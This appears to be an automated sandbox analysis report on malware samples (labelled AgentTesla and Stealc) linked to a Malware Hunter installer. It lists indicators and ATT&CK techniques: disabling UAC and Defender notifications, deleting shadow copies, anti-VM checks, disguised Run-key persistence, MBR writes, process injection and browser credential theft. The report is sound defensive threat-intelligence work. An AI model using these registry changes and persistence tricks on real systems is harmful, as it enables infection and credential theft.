agenttesla | hxxps://www[.]glarysoft[.]com/malware-hunter/

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications	powershell.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	powershell.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications	powershell.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

UAC bypass 3 TTPs 4 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	powershell.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5a4b8a265b4512cc6a8b192587a5c4c60f689165a6f75ec03c12cef3360355d1.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	8cb31def2f17ac26ddeaea048880afeeb27049fcc3dcf07a5f0382406cfeddb4.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	d6ec39a61882bd8ccdb1c7a0b5a602baa3d9fd7120a19631014f46bc7c62d4a3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e632189654d9ff1bf8a4efe340e0b04c6e09d6a1e4b5f4022573ed0871e7e03d.exe

Adds policy Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Brv-Q0EV0O = "\"C:\\ProgramData\\BraveShared\\BraveSharedUpdater.exe\""	0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	BraveSharedUpdater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Brv-Q0EV0O = "\"C:\\ProgramData\\BraveShared\\BraveSharedUpdater.exe\""	BraveSharedUpdater.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	iexplore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Brv-Q0EV0O = "\"C:\\ProgramData\\BraveShared\\BraveSharedUpdater.exe\""	iexplore.exe

Blocklisted process makes network request 5 IoCs

flow	pid	Process
1124	5288	powershell.exe
1140	6492	powershell.exe
1148	6516	powershell.exe
1150	6492	powershell.exe
1155	6516	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2724	powershell.exe
6492	powershell.exe
6860	powershell.exe
6516	powershell.exe

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002
A potential corporate email address has been identified in the URL: %./2678@CDFRabcdefghilmnoprstuvwy
phishing

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5a4b8a265b4512cc6a8b192587a5c4c60f689165a6f75ec03c12cef3360355d1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8cb31def2f17ac26ddeaea048880afeeb27049fcc3dcf07a5f0382406cfeddb4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8cb31def2f17ac26ddeaea048880afeeb27049fcc3dcf07a5f0382406cfeddb4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	d6ec39a61882bd8ccdb1c7a0b5a602baa3d9fd7120a19631014f46bc7c62d4a3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	d6ec39a61882bd8ccdb1c7a0b5a602baa3d9fd7120a19631014f46bc7c62d4a3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e632189654d9ff1bf8a4efe340e0b04c6e09d6a1e4b5f4022573ed0871e7e03d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e632189654d9ff1bf8a4efe340e0b04c6e09d6a1e4b5f4022573ed0871e7e03d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5a4b8a265b4512cc6a8b192587a5c4c60f689165a6f75ec03c12cef3360355d1.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	QuickSearch.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	MalwareHunter.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	MalwareHunter.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	PCBooster.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 29 IoCs

pid	Process
2720	mhsetup.exe
3804	version.exe
3016	MalwareHunter.exe
2708	MHCloudSvc.exe
3216	Initialize_Standalone_Pro.exe
3032	statisticsinfo.exe
4664	MalwareHunter.exe
4100	x64ProcessAssistSvc.exe
4108	MHCloudSvc.exe
5448	mhtray.exe
5772	PCBooster.exe
5812	QuickSearch.exe
5920	MemfilesService.exe
384	malwarehunter.exe
5500	Setup.exe
7812	nc.exe
5604	Setup.exe
6496	nc.exe
5136	malwarehunter.exe
2760	0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe
1776	BraveSharedUpdater.exe
4420	5a4b8a265b4512cc6a8b192587a5c4c60f689165a6f75ec03c12cef3360355d1.exe
7776	BraveCrashHandler.exe
3900	8cb31def2f17ac26ddeaea048880afeeb27049fcc3dcf07a5f0382406cfeddb4.exe
6084	b0fa52fead6b718bce1fd8816ad7201f648eb7483b3ec7cc284e26323e930807.exe
7468	d6ec39a61882bd8ccdb1c7a0b5a602baa3d9fd7120a19631014f46bc7c62d4a3.exe
6988	e632189654d9ff1bf8a4efe340e0b04c6e09d6a1e4b5f4022573ed0871e7e03d.exe
7088	dismhost.exe
2540	dismhost.exe

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	5a4b8a265b4512cc6a8b192587a5c4c60f689165a6f75ec03c12cef3360355d1.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	8cb31def2f17ac26ddeaea048880afeeb27049fcc3dcf07a5f0382406cfeddb4.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	d6ec39a61882bd8ccdb1c7a0b5a602baa3d9fd7120a19631014f46bc7c62d4a3.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	e632189654d9ff1bf8a4efe340e0b04c6e09d6a1e4b5f4022573ed0871e7e03d.exe

Loads dropped DLL 64 IoCs

pid	Process
2720	mhsetup.exe
2720	mhsetup.exe
2720	mhsetup.exe
2720	mhsetup.exe
4008	regsvr32.exe
4312	regsvr32.exe
1564	regsvr32.exe
2720	mhsetup.exe
2720	mhsetup.exe
3016	MalwareHunter.exe
3016	MalwareHunter.exe
3016	MalwareHunter.exe
3016	MalwareHunter.exe
3016	MalwareHunter.exe
3016	MalwareHunter.exe
3016	MalwareHunter.exe
3016	MalwareHunter.exe
3016	MalwareHunter.exe
3016	MalwareHunter.exe
3016	MalwareHunter.exe
3016	MalwareHunter.exe
3016	MalwareHunter.exe
3016	MalwareHunter.exe
3016	MalwareHunter.exe
3016	MalwareHunter.exe
3016	MalwareHunter.exe
2708	MHCloudSvc.exe
3216	Initialize_Standalone_Pro.exe
3216	Initialize_Standalone_Pro.exe
3216	Initialize_Standalone_Pro.exe
3216	Initialize_Standalone_Pro.exe
3216	Initialize_Standalone_Pro.exe
3216	Initialize_Standalone_Pro.exe
3216	Initialize_Standalone_Pro.exe
3216	Initialize_Standalone_Pro.exe
2720	mhsetup.exe
2720	mhsetup.exe
3032	statisticsinfo.exe
3032	statisticsinfo.exe
3032	statisticsinfo.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4100	x64ProcessAssistSvc.exe
4664	MalwareHunter.exe
4108	MHCloudSvc.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 16 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BraveCrashHandler = "C:\\ProgramData\\BraveCrashHandler.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BraveCrashHandler = "C:\\ProgramData\\BraveCrashHandler.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Brv-Q0EV0O = "\"C:\\ProgramData\\BraveShared\\BraveSharedUpdater.exe\""	0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Brv-Q0EV0O = "\"C:\\ProgramData\\BraveShared\\BraveSharedUpdater.exe\""	BraveSharedUpdater.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BraveCrashHandler = "C:\\Users\\Admin\\Embedit.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SheIlExperienceHost = "C:\\Users\\Admin\\AppData\\Local\\SheIlExperienceHost.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleCrashHandler = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleCrashHandler.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleCrashHandler = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleCrashHandler.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SheIlExperienceHost = "C:\\Users\\Admin\\AppData\\Local\\SheIlExperienceHost.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Brv-Q0EV0O = "\"C:\\ProgramData\\BraveShared\\BraveSharedUpdater.exe\""	0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Brv-Q0EV0O = "\"C:\\ProgramData\\BraveShared\\BraveSharedUpdater.exe\""	BraveSharedUpdater.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Brv-Q0EV0O = "\"C:\\ProgramData\\BraveShared\\BraveSharedUpdater.exe\""	iexplore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Brv-Q0EV0O = "\"C:\\ProgramData\\BraveShared\\BraveSharedUpdater.exe\""	iexplore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BraveCrashHandler = "C:\\Users\\Admin\\Embedit.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleCrashHandler64 = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleCrashHandler64.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleCrashHandler64 = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleCrashHandler64.exe"	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	MalwareHunter.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	MalwareHunter.exe

Enumerates connected drives 3 TTPs 3 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\F:	MemfilesService.exe
File opened (read-only)	\??\D:	MalwareHunter.exe
File opened (read-only)	\??\F:	MalwareHunter.exe

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1152	ip-api.com
1125	api.ipify.org
1126	api.ipify.org

Mark of the Web detected: This indicates that the page was originally saved or cloned. 1 IoCs

phishing motw

flow	ioc
576	https://storage.googleapis.com/script.aniview.com/ssync/62f53b2c7850d0786f227f64/ssync.html

Power Settings 1 TTPs 2 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
6568	powercfg.exe
6672	powercfg.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	MalwareHunter.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs

pid	Process
4420	5a4b8a265b4512cc6a8b192587a5c4c60f689165a6f75ec03c12cef3360355d1.exe
7776	BraveCrashHandler.exe
7776	BraveCrashHandler.exe
3900	8cb31def2f17ac26ddeaea048880afeeb27049fcc3dcf07a5f0382406cfeddb4.exe
7776	BraveCrashHandler.exe
7468	d6ec39a61882bd8ccdb1c7a0b5a602baa3d9fd7120a19631014f46bc7c62d4a3.exe
6988	e632189654d9ff1bf8a4efe340e0b04c6e09d6a1e4b5f4022573ed0871e7e03d.exe
7776	BraveCrashHandler.exe
7776	BraveCrashHandler.exe
7776	BraveCrashHandler.exe
7776	BraveCrashHandler.exe
7776	BraveCrashHandler.exe

Suspicious use of SetThreadContext 7 IoCs

description	pid	Process	procid_target
PID 5500 set thread context of 2788	5500	Setup.exe	295
PID 5604 set thread context of 7404	5604	Setup.exe	302
PID 1776 set thread context of 5412	1776	BraveSharedUpdater.exe	325
PID 5412 set thread context of 7496	5412	iexplore.exe	327
PID 6084 set thread context of 4724	6084	b0fa52fead6b718bce1fd8816ad7201f648eb7483b3ec7cc284e26323e930807.exe	345
PID 6492 set thread context of 444	6492	powershell.exe	371
PID 6516 set thread context of 5204	6516	powershell.exe	375

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\skins\default\Register\user_edit_normal.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\skins\default\Register\InnerBuyRSS\English\index.html	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\MalwareHunterTray\usbthreat.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\languages\korean.lng	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\skins\default\Register\export_normal.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\skins\default\Register\logomenu_normal.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\MalwareHunterTray\restorelogo.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\PCbooster\virusdisplay.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\languages\Tieng Viet.lng	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\languages\chinese.lng	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\languages\danish_kt.lng	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\data\DLFileInfo.dat	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\AntiVirus\setting_block.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\AntiVirus\log_update1.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\MalwareHunterTray\openstate.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\msvcp90.dll	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\skins\default\Register\my_user_normal0.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\skins\default\Register\window_left.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\AntiVirus\files.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\StartupHelper\2.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\StartupHelper\Level-5.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\StartupHelper\TimeNumber\1-1.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\x64\Languages.dll	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\skins\default\QuickSearch\logov.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\skins\default\Register\return_normal.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\PCbooster\download3.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\PCbooster\speedupclick.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\QuickSearch\images\quick_search.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\StartupHelper\4.png	mhsetup.exe
File opened for modification	C:\Program Files (x86)\Common Files\Glarysoft\StartupManager\config.ini	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\skins\default\Register\my_quick_normal.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\AntiVirus\about.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\AntiVirus\logo.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\AntiVirus\pro2.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\AntiVirus\warning_max.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\MalwareHunterTray\scanenable.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\skins\default\QuickSearch\history_delete_default.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\AntiVirus\check2.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\AntiVirus\close_min.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\AntiVirus\menu3.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\AntiVirus\setting_radio_uncheck.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\StartupHelper\TimeNumber\7_2.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\languages\Suomi(finnish).lng	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Native\winxp_x86\gumhfilter.cat	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\skins\default\QuickSearch\quick_search_history_hover.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\AntiVirus\close1.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\x64\CrashReport.dll	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\x64\mfcm90.dll	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\AntiVirus\safe_min.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\AntiVirus\update1.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\MalwareHunterTray\downloadsethover.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\QuickSearch\images\quick_search_dir_delete.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\skins\default\Register\about\about_backimage.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\AntiVirus\log_downloaded1.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\PCbooster\push_enable.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\StartupHelper\TimeNumber\4_2.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\CollDLFileInfo.dll	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Cloudscan\msvcm90.dll	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\skins\default\Register\about\home-click.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\AntiVirus\setting_radio_check1.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\skins\default\Register\my_ok_click.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\skins\default\Register\about\home-default.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\AntiVirus\close2.png	mhsetup.exe
File created	C:\Program Files (x86)\Glarysoft\Malware Hunter\Resources\AntiVirus\safe.png	mhsetup.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4028	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 43 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SchTasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	malwarehunter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AutoIt3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8cb31def2f17ac26ddeaea048880afeeb27049fcc3dcf07a5f0382406cfeddb4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	more.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d6ec39a61882bd8ccdb1c7a0b5a602baa3d9fd7120a19631014f46bc7c62d4a3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MHCloudSvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BraveSharedUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b0fa52fead6b718bce1fd8816ad7201f648eb7483b3ec7cc284e26323e930807.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MalwareHunter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	more.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AutoIt3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
